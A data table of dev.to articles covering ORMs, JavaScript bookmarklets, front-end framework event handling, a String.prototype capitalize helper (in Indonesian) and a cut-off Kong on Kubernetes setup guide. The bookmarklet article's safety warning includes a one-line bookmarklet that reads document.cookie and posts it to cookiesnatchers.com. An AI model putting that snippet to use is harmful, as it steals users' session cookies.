id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
712,116 | Brief Introduction to ORM | ORM (Object-Relational Model) in 50 words Relational databases like MySQL are not object o... | 0 | 2021-05-29T14:11:29 | https://dev.to/il3ven/brief-introduction-to-orm-5b3h | database, sql | #### ORM (Object-Relational Model) in 50 words
Relational databases like MySQL are not object oriented. An ORM solves this problem. It provides an abstraction layer over relational databases.
In other words, ORM is an library using which you can create objects for your entities. For example, the entities for an ecommerce app can be Users, Orders and Products. These entities will get converted into tables by an ORM. An ORM will generate SQL queries for you and communicate with your database.

## Example
Creating tables with one-to-many relationships in ORM is as easy as creating a class. Here one teacher teaches many courses.
```js
class Teachers {
id: Primary_Key,
name: String,
age: Number,
courses: Courses[], // one-to-many relationship is as simple as creating an array
}
```
Inserting entries into the table is as easy as using the `new` operator.
```js
teacher = new Teacher()
teacher.name = 'Alice'
teacher.age = 32
teacher.save()
```
### Pros of an ORM
- Modelling data is easier because instead of tables you are working with objects.
- Time is saved as fewer queries have to written.
- Cleaner code is produced when using an ORM.
- Switching databases is easier as it is abstracted.
### Cons of an ORM
- Different ORMs have slightly different syntax and need to be learned.
- Some queries cannot be performed with an ORM and one needs to use SQL for them.
### Popular ORMs
ORM is a library available in many different programming languages.
##### JavaScript
- [Sequelize](https://sequelize.org/)
- [TypeORM](https://typeorm.io/#/)
##### Python
- [SQLAlchemy](https://www.sqlalchemy.org/)
- [Django](https://www.djangoproject.com/)
##### Java
- [Hibernate](https://hibernate.org/) | il3ven |
734,133 | On bookmarklets and how to make them | Bookmarklets are bookmarks which execute javascript instead of opening a new page. They are... | 0 | 2021-06-24T09:37:51 | https://dev.to/siddharthshyniben/on-bookmarklets-and-how-to-make-them-45cd | javascript, tutorial | ### Bookmarklets are bookmarks which execute javascript instead of opening a new page. They are available in almost every browser, including Chrome, Firefox and most Chromium based browsers
They are pretty easy to make, and can do almost everything, including injecting other scripts, interacting with the DOM, and absolutely everything you can do with JavaScript.
## How to make a bookmarklet
That's pretty easy, just create a bookmark (using whatever method your browser has) with the following content:
```js
javascript:(() => {/* Your code goes here */})();
```
The `javascript:` part tells the browser that the bookmark is actually javascript which is to be executed.
The rest of the code is executed as normal, but you can make it an IIFE (Immediately-Invoked Function Expression) so that you don't accidentally overwrite any variables already defined. The code can be whatever you like, but on some sites (like GitHub) some action may be blocked (like injecting scripts)

<figcaption>I can't inject jQuery!!</figcaption>
Another neat trick is that if you make the bookmarklet return any HTML, the content of the current page will be overwritten with the HTML! (which is perfect if you want a random xkcd fetcher)
## Sharing bookmarklets
It's pretty annoying to have to copy the code for a bookmarklet if you want to use it yourself, right!
Well,
- Bookmarklets are just URLs
- URLs can be added to the `href` of a link
- A link can be bookmarked (right click or drag to bookmarks bar)
So, if you want to put a shareable bookmark on a website, just make an `<a>` element with the `href` set to whatever code
```html
<a href="javascript:(()=>{alert('Hello, World!'); })();">Bookmark me</a>
```
Unfortunately, I can't seem to be able to add bookmarklets over here, so here's a pen with the output:
{% codepen https://codepen.io/SiddharthShyniben/pen/XWMLvYy default-tab=html,result %}
Here's some more bookmarklets which you could use:
{% codepen https://codepen.io/SiddharthShyniben/pen/BaWgXOW %}
## Safety
Bookmarklets are equal to running scripts on a page, so you have to be really careful with them.
For example, this bookmarklet could easily read cookies and post them somewhere:
```js
javascript:(() => fetch('http://cookiesnatchers.com?cookie=' + document.cookie, {method:'POST'})();
```
Once again, you have to be really careful about what bookmarklets do.
Thanks for reading! If you have any nice bookmarklets, please share them down below! | siddharthshyniben |
735,142 | Javascript Event Handling - Deep Dive | An unopinionated research (white) paper on front end event handling under the hood. Table... | 0 | 2021-06-22T14:00:26 | https://dev.to/nasidulislam/javascript-event-handling-deep-dive-112m | javascript, react, webpack, babel | *An unopinionated research (white) paper on front end event handling under the hood.*
## Table of Contents
- Introduction
- Overview
- Deep Dive
- [React](#react)
- [Vue](#vue)
- [Angular JS](#angular)
- [Svelte](#svelte)
- [jQuery - 1.6.4](#jquery)
- Resources
### Introduction
**Objective**
The article takes an impartial approach at researching event handling in various UI tools. The content is based on official documentation -- *NOT* on opinion.
**Purpose**
The purpose is to understand how the same "problem" was solved across these tools.
**What this article is NOT**
This article does not assess the pros and cons -- neither does it recommend one tool over another.
### Overview
The world of Javascript evolves at a breakneck speed. For the longest time, a webpage would consist of a single, monolithic script file that handled everything - starting from enabling interactivity on the page to calling services and rendering content. The pattern has significant drawbacks. Monolithic architectures are difficult to scale and maintain in the long term. Especially at enterprise level where there are several engineers contributing code, a monolithic architecture tends become a spaghetti mess that is hard to debug.
The inherent nature of Javascript allows engineers to innovate over this pattern and come up with ingenious ways to tackle the drawbacks. There are many, **many**, [front end libraries and frameworks](https://github.com/collections/front-end-javascript-frameworks) out there these days, each with its own superpowers and opinionated ways of approaching the problem. As a result, modern day developers are spoilt for choices when it comes to picking a system to built their application.
Although the list of tools at the disposal of developers is exhaustive, not many have stood the test of time and battle. In this article, we will investigate the ones that have come out (fairly) unscathed, in an attempt to understand how they handle events.
### Deep Dive
In this section, we will deep dive into several popular, publicly available UI libraries and frameworks to investigate how they handle events. Let’s start with arguably the most popular.
<div id="react"></div>

#### Handling events in React
Event handling in React centers around [ReactBrowserEventEmitter](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/react-dom/src/events/ReactBrowserEventEmitter.js). The very first comment in the source code does a decent job of explaining how it works.
Summary of `ReactBrowserEventEmitter` event handling:

#### Let's dive deep and break each of them down:
> --> Top-level delegation is used to trap most native browser events. This may only occur in the main thread and is the responsibility of `ReactDOMEventListener`, which is injected and can therefore support pluggable event sources. This is the only work that occurs in the main thread.
React uses event delegation to handle most of the interactive events in an application. This means when a `button` with an `onClick` handler is rendered
```
<button onClick={() => console.log('button was clicked')}>Click here</button>
```
React does not attach an event listener to the `button` node. Instead, it gets a reference to the document root where the application is rendered and [mounts](https://github.com/facebook/react/blob/8a8d973d3cc5623676a84f87af66ef9259c3937c/packages/react-dom/src/client/ReactDOMComponent.js#L225) an event listener there. **React uses a single event listener per event type** to invoke all submitted handlers within the virtual DOM. Whenever a DOM event is fired, those top-level listeners initiate the actual event dispatching through the React source code — it re-dispatched the event for each and every handler. This can be seen in the source code of [EventPluginHub](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginHub.js).
> --> We normalize and de-duplicate events to account for browser quirks. This may be done in the worker thread.
**React normalizes event-types** so that so that each and every browser, regardless of its underlying engines or whether its old or modern, will have consistent event arguments. This means, across all browsers, devices and operating systems, a `click` event will have arguments like this
- **boolean** altKey
- **boolean** metaKey
- **boolean** ctrlKey
- **boolean** shiftKey
- **boolean** getModifierState(key)
- **number** button
- **number** buttons
- **number** clientX
- **number** clientY
- **number** pageX
- **number** pageY
- **number** screen
- **number** screenX
- **DOMEventTarget** relatedTarget
**Further reading**: events supported in React, read [this](https://reactjs.org/docs/events.html#supported-events).</p>
> --> Forward these native events (with the associated top-level type used to trap it) to `EventPluginHub`, which in turn will ask plugins if they want to extract any synthetic events.
React considers the nature of each event and categorizes them into buckets. It has dedicated plugins built to manage events in each bucket. **Each of these plugins are then in turn responsible for extracting and handling the various event types** in that bucket. For instance, the `SimpleEventPlugin` will handle events implemented in common browsers such as mouse and key press events ([source](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/node_modules/react/lib/SimpleEventPlugin.js?viewer=share)) and `ChangeEventPlugin` will handle `onChange` events ([source](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/react-with-addons.js?viewer=share)). The final piece that unifies all the plugins into a single place and re-directs events to each individual plugin is the `EventPluginHub`.
This opens the door for us to understand how React views events. React introduces the concept of `SyntheticEvents`, which React defines as "*implementation of the DOM Level 3 Events API by normalizing browser quirks*". Basically, it is a **wrapper around the browser's native event object** with the same interface — and that it works in identical fashion across all browsers.
For React v16 and earlier, synthetic events utilizes a polling mechanism. This mechanism ensures that the same object instance is used in multiple handlers, but it is being reset with new properties before each and every invocation and is then disposed.
> --> The `EventPluginHub` will then process each event by annotating them with "dispatches", a sequence of listeners and IDs that care about that event.
**In the React ecosystem, a single event listener is attached at the document root for any one event-type**. Since each event type will most likely have multiple handlers, **React will accumulate the events and their handlers** ([source](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPropagators.js#L90)). Then, it will do relevant dispatches, which consist of event handlers and their corresponding fiber nodes. The fiber nodes are nodes in the virtual DOM tree. Fiber nodes are calculated using React’s Reconciliation algorithm, which is its “diffing” algorithm to drive updates on the page.
**Further reading**: [React Fiber Architecture](https://blog.logrocket.com/deep-dive-into-react-fiber-internals/)
**Further reading**: [React Reconciliation concept](https://reactjs.org/docs/reconciliation.html)
> --> The `EventPluginHub` then dispatches the events.
The final piece of the puzzle — **the plugin hub goes through the accumulated information and dispatches the events**, thus invoking the submitted event handlers ([source](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginUtils.js#L77)).
**Simple Demo**
Here is a simple click handler demo implementation in React --> [Link](https://codesandbox.io/s/thirsty-wildflower-57x4m?file=/src/App.js).
<div id="vue"></div>

#### Handling events in Vue
In Vue, you create `.vue` file that contains a `script` tag to execute javascript and a `template` tag that wraps all markup (both DOM and custom elements). This is a self contained instance of a Vue component that could also contain a `style` tag to house the CSS.
> --> Simple DOM events handling
Vue allows developers to bind events to elements using `v-on:<event-name>` or in short, `@<event-name` directive, and to store the state of application in a `data` prop. **All the event handlers are stored similarly in a `methods` prop on the same object**.
```
// App.vue
<template>
<div id="app">
<HelloWorld :msg="msg" />
<button @click="greet('World', $event)">
click here
</button>
</div>
</template>
<script>
import HelloWorld from "./components/HelloWorld";
export default {
name: "App",
components: { HelloWorld },
data: function () {
return { msg: "Vue" };
},
methods: {
greet: function (message, $event) { this.msg = message; }
}
}
</script>
```
The application will load with a message of “Hello Vue”. When the button is clicked, the handler will set the message to World and display a “Hello World” message --> [REPL](https://codesandbox.io/s/vue-demo-dom-event-handler-wxces?file=/src/App.vue). It is possible to access the original DOM event by passing in an object from the handler reference and accessing in the event handler.
> --> Event Modifiers
Although it is possible to access the DOM event object in the handler by simply passing it in, Vue improves developer experience by allowing to extend event handling by attaching ‘modifiers’ to it. This way, **Vue will handle the modifiers for you instead of the developer calling those modifiers explicitly in their handlers**. Multiple modifiers can be attached by using a dot delimited pattern. The full list of supported modifiers is as follows:
- `.stop`
- `.prevent`
- `.capture`
- `.self`
- `.once`
- `.passive`
Thus, a simple example would look like this
```
/* this will trigger the handler method only once */
<button v-on:click.stop.once="clickHandler">Click me</button>
```
Link --> [REPL](https://codesandbox.io/s/vue-demo-event-modifiers-gbqmo?file=/src/App.vue).
> --> Key Modifiers
**Vue has a feature to attach keyboard events in almost identical fashion as regular event handlers**. It supports a list of aliases with commonly attached keyboard events such as the `enter` and `tab` keys. The full list of aliases is given below:
- `.enter`
- `.tab`
- `.delete` (captures both the "Delete" and "Backspace" keys)
- `.esc`
- `.up`
- `.down`
- `.left`
- `.right`
- `.space`
A simple example would look like the following
```
<!-- only call `vm.submit()` when the `key` is `Enter` -->
<input v-on:keyup.enter="submit">
```
LInk --> [REPL](https://codesandbox.io/s/vue-demo-keyboard-events-mknml?file=/src/App.vue).
> --> Custom Events
**Vue handles publishing and subscribing to custom events**. The caveat here is that every component that should listen for events should maintain an explicit list of those custom events. A simple example would look like this
```
// emit event
this.$emit('myEvent')
// bind to the event
<my-component v-on:myevent="doSomething"></my-component>
```
Unlike components and props, event names will never be used as variable or property names in JavaScript, so there’s no reason to use camelCase or PascalCase. Additionally, `v-on` event listeners inside DOM templates will be automatically transformed to lowercase (due to HTML’s case-insensitivity), so `v-on:myEvent` would become `v-on:myevent` -- making `myEvent` impossible to listen to. Vue JS as a framework recommends using kebab-casing for event names.
Link --> [REPL](https://codesandbox.io/s/vue-demo-custom-events-5bbuh).
<div id="angular"></div>

Angular is one of the first generation, opinionated frameworks that focuses towards building Single Page Applications (SPAs). Although it has gone significant re-invention in recent times, it still falls short in a number of ways when compared to the more modern tools available to developers these days (some of which are discussed in this article). It is still, however, valuable to take a peek at how the framework binds and handles events.
#### Handling events in Angular (4.x and above)
Angular has a very specific syntax to bind and handle events. This syntax consists of a target event name within parentheses to the left of an equal sign, and a quoted template statement to the right ([source](https://angular.io/guide/event-binding)).
A simple example of DOM event binding and handling looks like this
```
<button (click)="onSave()">Save</button>
```
**When events are being bound, Angular configures an event handler for the target event** — it can be used with custom events as well. When either the component or the directive *raises* the event, the handler executes the *template statement*. Then, the template statement performs an action in response to the event.
**In Angular, it is possible to pass an $event object to the function handling the event**. The shape of the `$event` object is determined by the `target event`. If the event is a native DOM element event, then the `$event` object is a [DOM event object](https://developer.mozilla.org/en-US/docs/Web/Events). Lets look at a simple example ([source](https://angular.io/guide/event-binding-concepts))
```
<input
[value]="currentItem.name"
(input)="currentItem.name=$event.target.val"
/>
```
There are a couple of things happening here:
1. The code binds to the `input` event of the `<input>` element, which allows the code to listen for changes.
2. When the user makes changes, the component raises the `input` event.
3. The binding executes the statement within a context that includes the DOM event object, `$event`.
4. Angular retrieves the changed text by following the path `$event.target.vaue` and updates the `name` property.
If the event belongs to a directive or component, `$event` has the shape that the directive or component produces.
Link --> [REPL](https://stackblitz.com/angular/pegebmnalav?file=src%2Fapp%2Fapp.component.ts).
<div id="svelte"></div>

#### Handling events in Svelte
In Svelte, you create a `.svelte` file that is meant to self contain a component instance with its CSS, JS and HTML, along with any custom elements that are needed.
> --> Simple DOM events handling
A simple demo for a click handler will look like the following:
```
<script>
let name = 'world';
function update() { name = 'Svelte'; }
</script>
<span on:click={update}>Hello { name }</span>
```
This will print `Hello World` on load, but will update and print `Hello Svelte` when user clicks on `h1` -> [REPL](https://svelte.dev/repl/af38f740da8c4733817a26328ba7d061?version=3.31.0). This is the general pattern in which DOM events such as `click`, `mousemove`, etc are implemented in Svelte (it supports inline handlers as well).
> --> Event Modifiers
**The system allows developers to add pipe delimited modifiers to the event**, such as `preventDefault` and `stopPropagation`. The handler function is able to accept an `event` argument that also has access to these modifiers, but Svelte offers an improvement in developer experience by offering these shorthands. An example would look like the following:
```
<script>
function handleClick() { alert('This alert will trigger only once!'); }
</script>
<button on:click|once={ handleClick }>Click here</button>
```
Thus, the pattern looks like `on:<event-name>|modifier1|modifier2|...` -> [REPL](https://svelte.dev/repl/a5d264f4ace9462faf39b2a592e97295?version=3.31.0). The full list of modifiers is below ([source](https://svelte.dev/tutorial/event-modifiers)):
- `preventDefault` - calls `event.preventDefault()` before running the handler. Useful for client-side form handling
- `stopPropagation` - calls `event.stopPropagation()`, preventing the event from reaching the next element
- `passive` - improves scrolling performance on touch/wheel events (Svelte will add it automatically where its safe to do so)
- `nonpassive` - explicitly set `passive: false`
- `capture` - fires the handler during the *capture* phase instead of the *bubbling* phase ([MDN docs](https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Building_blocks/Events#event_bubbling_and_capture))
- `once` - remove the handler after the first time it runs
- `self` - only trigger handler if `event.target` is the element itself
> --> Dispatching events
**In Svelte, a parent component can update state based on data dispatched from a child component** using a function called `createEventDispatcher`. The function allows the child component to emit a data object at a user defined key. The parent component can then do as it pleases with it -> [REPL](https://svelte.dev/repl/2212634b19314d2c9e157dffd73edd8f?version=3.31.0) (open console to see dispatched data object).
> --> Event forwarding
The caveat to component events is that it does not *bubble*. Thus, **if a parent component needs to listen on an event that is emitted by a deeply nested component, all the intermediate components will have to *forward* that event**. Event forwarding is achieved by adding the custom data key on each wrapper component as we traverse up Svelte DOM. Finally, the parent component where the event needs to be handles implements a handler for it -> [REPL](https://svelte.dev/repl/49b1b14aef8f4bff8fab771394ae876c?version=3.32.3) (open console to see demo).
> --> Actions
The final piece in Svelte event handling is the implementation of `actions`. **Actions are element level functions that are useful for adding custom event handlers**. Similar to transition functions, an action function receives a `node` and some optional parameters and returns an action object. That object can have a `destroy` function, which is called when the element is unmounted -> [REPL](https://svelte.dev/repl/79f3cd81b76d42909ec69e042c74abd5?version=3.31.0) (borrowed from Svelte official resources).
**Further reading**: [Svelte official tutorials](https://svelte.dev/tutorial/basics)
**Further reading**: [Compile Svelte in your head](https://lihautan.com/compile-svelte-in-your-head-part-1/#adding-event-listeners)
<div id="jquery"></div>

#### Handling events in jQuery
The primary benefit of using jQuery is that it makes DOM traversal and manipulation quite convenient. Since most browser events initiated by users are meant to provide UI feedback, this feature handy. Under the hood, jQuery uses a powerful "selector" engine called [Sizzle](https://github.com/jquery/sizzle). Sizzle is a pure JS-CSS selector engine designed to be dropped in to any host library.
Let’s look at the programming model and categories of how jQuery binds and handles events. The “source” links provided is the official documentation of the APIs and has additional information of how they work:
> --> Browser Events
Source: [Browser Events](https://api.jquery.com/category/events/browser-events/)
jQuery is able to handle the following browser events out of the box.
- `.error()`: Bind an event handler to the "error" JS event ([source](https://api.jquery.com/error/))
- `.resize()`: Bind an event handler to the "resize" JS event, or trigger the on an element ([source](https://api.jquery.com/resize/))
- `.scroll()`: Bind an event handler to the "scroll" JS event, or trigger the event on an element ([source](https://api.jquery.com/scroll/))
> --> Document Loading
Source: [Document Loading](https://api.jquery.com/category/events/document-loading/)
jQuery provides a short list of out of the box APIs to handle events related to initial page load
- `jQuery.holdReady()`: Holds or releases the execution of jQuery's ready event ([source](https://api.jquery.com/jQuery.holdReady/))
- `jQuery.ready()`: A Promise-like object that resolves when the document is ready ([source](https://api.jquery.com/jQuery.ready/))
- `.load()`: Bind an event handler to the "load" JS event ([source](https://api.jquery.com/load-event/))
- `.ready()`: Specify a function to execute when the DOM is fully loaded ([source](https://api.jquery.com/ready/))
- `.unload()`: Bind an event handler to the "unload" JS event ([source](https://api.jquery.com/unload/))
> --> Form Events
Source: [Form Events](https://api.jquery.com/category/events/form-events/)
jQuery provides a decent list of out of the box APIs to handle commonly occurring form events
- `.blur()`: Bind an event handler to the “blur” JS event, or trigger that event on an element ([source](https://api.jquery.com/blur/))
- `.change()`: Bind an event handler to the “change” JS event, or trigger that event on an element ([source](https://api.jquery.com/change/))
- `.focus()`: Bind an event handler to the “focus” JS event, or trigger that event on an element ([source](https://api.jquery.com/focus/))
- `.focusin()`: Bind an event handler to the “focusin” JS event ([source](https://api.jquery.com/focusin/))
- `.focusout()`: Bind an event handler to the “focusout” JS event ([source](https://api.jquery.com/focusout/))
- `.select()`: Bind an event handler to the “select” JS event, or trigger that event on an element ([source](https://api.jquery.com/select/))
- `.submit()`: Bind an event handler to the “submit” JS event, or trigger that event on an element ([source](https://api.jquery.com/submit/))
> --> Keyboard Events
Source: [Keyboard Events](https://api.jquery.com/category/events/keyboard-events/)
The following are out of the box APIs provided by jQuery to handle keyboard events
- `.keydown()`: Bind an event handler to the "keydown" JS event, or trigger that event on an an element ([source](https://api.jquery.com/keydown/))
- `.keypress()`: Bind an event handler to the "keypress" JS event, or trigger that event on an an element ([source](https://api.jquery.com/keypress/))
- `.keyup()`: Bind an event handler to the "keyup" JS event, or trigger that event on an an element ([source](https://api.jquery.com/keyup/))
> --> Mouse Events
Source: [Mouse Events](https://api.jquery.com/category/events/mouse-events/)
This is where jQuery begins to shine as far as event handling is concerned. It offers a large suite of mouse event binders out of the box for developers to use.
- `.click()`: Bind an event handler to the "click" JS event, or trigger that event on an an element ([source](https://api.jquery.com/click/))
- `.dblclick()`: Bind an event handler to the "dblclick" JS event, or trigger that event on an an element ([source](https://api.jquery.com/dblclick/))
- `.contextmenu()`: Bind an event handler to the "contextmenu" JS event, or trigger that event on an an element ([source](https://api.jquery.com/contextmenu/))
- `.mousemove()`: Bind an event handler to the "mousemove" JS event, or trigger that event on an an element ([source](https://api.jquery.com/mousemove/))
- `.mouseout()`: Bind an event handler to the "mouseout" JS event, or trigger that event on an an element ([source](https://api.jquery.com/mouseout/))
- `.mouseover()`: Bind an event handler to the "mouseover" JS event, or trigger that event on an an element ([source](https://api.jquery.com/mouseover/))
- `.mouseup()`: Bind an event handler to the "mouseup" JS event, or trigger that event on an an element ([source](https://api.jquery.com/mouseup/))
- `.toggle()`: Bind an event handler to the "toggle" JS event, or trigger that event on an an element ([source](https://api.jquery.com/toggle-event/))
- `.hover()`: Bind an event handler to the "hover" JS event, or trigger that event on an an element ([source](https://api.jquery.com/hover/))
- `.mousedown()`: Bind an event handler to the "mousedown" JS event, or trigger that event on an an element ([source](https://api.jquery.com/mousedown/))
- `.mouseenter()`: Bind an event handler to the "mouseenter" JS event, or trigger that event on an an element ([source](https://api.jquery.com/mouseenter/))
- `.mouseleave()`: Bind an event handler to the "mouseleave" JS event, or trigger that event on an an element ([source](https://api.jquery.com/mouseleave/))
> --> The Event Object
Souce: [Event Object](https://api.jquery.com/category/events/event-object/), [Inside Event Handling Function](https://learn.jquery.com/events/inside-event-handling-function/)
Event handlers in jQuery accepts the event object as the first argument. This object has access to various properties and modifiers. Here is a list of the more commonly occurring ones:
- `event.currentTarget()`: The current DOM element within the event handling bubbling phase ([source](https://api.jquery.com/event.currentTarget/))
- `event.target()`: The DOM element that initiated the event ([source](https://api.jquery.com/event.target/))
- `event.data()`: Optional data object passed to the handler when the current executing handler is bound ([source](https://api.jquery.com/event.data/))
- `event.preventDefault()`: If this method is called, the default action of the event will not be triggered ([source](https://api.jquery.com/event.preventDefault/))
- `event.stopPropagation()`: Prevents the event from bubbling up the DOM tree, preventing any parent handlers from being notified of the event ([source](https://api.jquery.com/event.stopPropagation/))
**Note**: Information below this point is related to jQuery versions later than `1.6.4`
> --> The `.on()` Event Handler Attachment API
Source: [The `.on()` Event Handler Attachment API](https://api.jquery.com/on/)
Modern versions of jQuery provides an all-encompassing API to handle events -- the `.on()`. This API is designed to bind almost all of the events listed above with one single stroke. It is the recommended way to bind events ([according to official documentation](https://learn.jquery.com/events/handling-events/)) from jQuery - 1.7 version and onwards. A few syntax examples can be seen below:
```
// Markup to be used for all examples that follow
<div class='outer'>
<span class='inner'>Any content</span>
</div>
```
```
// Exhibit A: the simple click handler, targeting the inner span
$('.outer .inner').on('click', function(event) {
console.log(event);
alert( 'inner span was clicked!!' );
});
// Exhibit B: attaching separate handlers to different event types
$('.outer .inner').on({
mouseenter: function() {
console.log( 'hovered over a span' );
},
mouseleave: function() {
console.log( 'mouse left a span' );
},
click: function() {
console.log( 'clicked a span' );
}
});
// Exhibit C: attaching the same handler to different event types
$('.outer .inner').on('click', function() {
console.log( 'The span was either clicked or hovered on' );
});
// Exhibit D: Event delegation --> binding events to elements that don't exist yet
$('.outer .inner').on('click', '<selector-of-element-that-dont-exist-yet>', function() {
console.log( 'The element was clicked' );
});
```
> --> Other Event Handler Attachment APIs
Source: [Event Handler Attachment](https://api.jquery.com/category/events/event-handler-attachment/)
The `.on()` API is arguably the most popular API offered by jQuery. Apart from it, there are other interfaces jQuery has out of the box that provides a useful suite of functionality. The following is a list of the most commonly occurring ones:
- `one()`: Attach a handler to an event for the elements. The handler is executed at most once per element per event type ([source](https://api.jquery.com/one/))
- `off()`: Remove an event handler ([source](https://api.jquery.com/off/))
- `trigger()`: Execute all handlers and behaviors attached to the matched elements for the given event type ([source](https://api.jquery.com/trigger/))
### Resources
- [List of front end JS frameworks](https://github.com/collections/front-end-javascript-frameworks)
- React
- [ReactBrowserEventEmitter](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/react-dom/src/events/ReactBrowserEventEmitter.js)
- [ReactDOMComponent](https://github.com/facebook/react/blob/8a8d973d3cc5623676a84f87af66ef9259c3937c/packages/react-dom/src/client/ReactDOMComponent.js)
- [Synthetic Events](https://reactjs.org/docs/events.html#supported-events)
- [EventPluginHub](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginHub.js)
- [SimpleEventPlugin](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/node_modules/react/lib/SimpleEventPlugin.js?viewer=share)
- [ChangeEventPlugin](https://share.cocalc.com/share/a04c90b3eaea18961287b4f6b5c13a7df2d3f0f1/react/wstein/react-with-addons.js?viewer=share)
- [EventPropagators](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPropagators.js)
- [EventPluginUtils](https://github.com/facebook/react/blob/b87aabdfe1b7461e7331abb3601d9e6bb27544bc/packages/events/EventPluginUtils.js)
- [Reconciliation Algorithm](https://reactjs.org/docs/reconciliation.html)
- [React Fiber Architecture](https://blog.logrocket.com/deep-dive-into-react-fiber-internals/)
- Svelte
- [Svelte official tutorials](https://svelte.dev/tutorial/basics)
- [Compile Svelte in your head](https://lihautan.com/compile-svelte-in-your-head-part-1/#adding-event-listeners)
- Vue
- [Event handling](https://vuejs.org/v2/guide/events.html)
- [Event Modifiers](https://vuejs.org/v2/guide/events.html#Event-Modifiers)
- [Keyboard Events](https://vuejs.org/v2/guide/events.html#Key-Modifiers)
- [Custom Events](https://vuejs.org/v2/guide/components-custom-events.html)
- Angular
- [Event handling](https://angular.io/guide/event-binding)
- [Event binding concepts](https://angular.io/guide/event-binding-concepts)
- jQuery
- [Sizzle](https://github.com/jquery/sizzle)
- [Browser Events](https://api.jquery.com/category/events/browser-events/)
- [Document Loading](https://api.jquery.com/category/events/document-loading/)
- [Form Events](https://api.jquery.com/category/events/form-events/)
- [Keyboard Events](https://api.jquery.com/category/events/keyboard-events/)
- [Mouse Events](https://api.jquery.com/category/events/mouse-events/)
- [Event Object](https://api.jquery.com/category/events/event-object/)
- [Inside Event Handling Function](https://learn.jquery.com/events/inside-event-handling-function/) | nasidulislam |
735,154 | String Prototype Capitalize | Note: This article is intended for Indonesians Perkenalan Javascript mempunyai banyak... | 0 | 2021-06-22T02:40:15 | https://dev.to/dimasandhk/string-prototype-capitalize-5dhn | javascript | **Note: This article is intended for Indonesians**
# Perkenalan
Javascript mempunyai banyak built in function pada prototype. Ada di array, string, object, dan lain2. Salah satu contohnya adalah `String.prototype.toUpperCase()` yang memungkinkan kita membuat string menjadi huruf besar.
## String.prototype.toUpperCase()
```javascript
const str = 'ini teks';
console.log(str.toUpperCase()) // => 'INI TEKS'
```
Tapi pada suatu saat kita mungkin perlu mengubah string menjadi huruf kapital, tetapi javascript tidak punya builtin function seperti itu. Jadi solusinya adalah kita membuat function sendiri seperti pada contoh berikut:
## Contoh Function Capitalize
```javascript
function capitalize(str) {
return `${str[0].toUpperCase()}${str.slice(1)}`
}
console.log(capitalize('ini teks')) // => 'Ini teks'
```
#### Penjelasan
`str[0].toUpperCase()` kode ini dapat mengubah huruf pertama pada string menjadi kapital, dan kode `str.slice(1)` menampilkan string dari index ke 1
#### Permasalahan
Ini bekerja dengan baik tetapi tidak seperti yang kita harapkan. Contoh yang saya buat diatas merupakan function biasa, yang bisa menjadikan kode kita sulit dibaca jika sudah terdapat banyak function. Lalu gimana cara kita dapat membuat function seperti `.toUpperCase()`? Caranya seperti berikut:
## String.prototype.capitalize()
```javascript
String.prototype.capitalize = function() {
return `${this[0].toUpperCase()}${this.slice(1)}`
}
console.log('ini teks'.capitalize()) // => 'Ini teks'
```
Isi functionnya sama dengan yang kita buat pada contoh diatas ini, tetapi penulisan kode menjadi lebih rapih karena kita mendefinisikannya langsung ke prototype, ini seakan2 menjadikan capitalize seperti function bawaan javascript. <br>
#### Penjelasan
Tetapi jika dilihat ada yang berubah, kita memakai keyword `this` pada kode diatas karena `this` pada kode diatas mereferensikan ke string yang kita beri method capitalize, contoh:
```javascript
String.prototype.capitalize = function() {
return this
}
console.log('ini teks'.capitalize()) // => 'ini teks'
```
Jadi `this` pada kode diatas digunakan untuk menangkap stringnya, dan karena itu pula kita tidak dapat menggunakan arrow function karena keyword `this` akan berisi `undefined`
| dimasandhk |
736,129 | Full Stack Kubernetes with Kong Ingress Controller | Kubernetes has become the name of the game when it comes to container orchestration. It allows teams... | 0 | 2021-06-28T17:19:02 | https://dev.to/mbogan/full-stack-kubernetes-with-kong-ingress-controller-hm3 | kubernetes, devops, docker | Kubernetes has become the name of the game when it comes to container orchestration. It allows teams to deploy and scale applications to meet changes in demand while providing a great developer experience.
The key to handling modern dynamic, scalable workloads in Kubernetes is a networking stack that can deliver API management, a service mesh and an ingress controller. [Kong Ingress Controller](https://github.com/Kong/kubernetes-ingress-controller) allows users to manage the routing rules that control external user access to the service in a Kubernetes cluster from the same platform.
This article will look at how you can use [Kong](https://konghq.com/?utm_source=guest&utm_medium=devspotlight&utm_campaign=community) for full-stack application deployments with Kubernetes. By full-stack, we mean Kong can handle:
* Containers
* Container networking
* Pod networking
* Service networking
* Host networking
* [Load balancing](https://dzone.com/articles/load-balancing-minecraft-servers-with-kong-gateway)
* [Rate limiting](https://konghq.com/blog/kong-gateway-rate-limiting/?utm_source=guest&utm_medium=devspotlight&utm_campaign=community)
* HTTPS redirects
Let's get started by creating our cluster.
## Installing Kind Kubernetes
With Kind, you can run local Kubernetes clusters using Docker. It was designed for testing Kubernetes but is perfect for local K8 development like we will do in this example. There are quite a few ways to install Kind, depending on your operating system. If you have a Mac, you can install it quickly with Homebrew:
```
brew install kind
```
If you are on a Windows machine and have Chocolatey installed, the command is just as simple:
```
choco install kind
```
If you have Go and Docker installed, you can run the following command to install kind:
```
GO111MODULE="on" go get sigs.k8s.io/kind@v0.10.0
```
For more installation options, see the[ Kind quickstart](https://kind.sigs.k8s.io/docs/user/quick-start/).
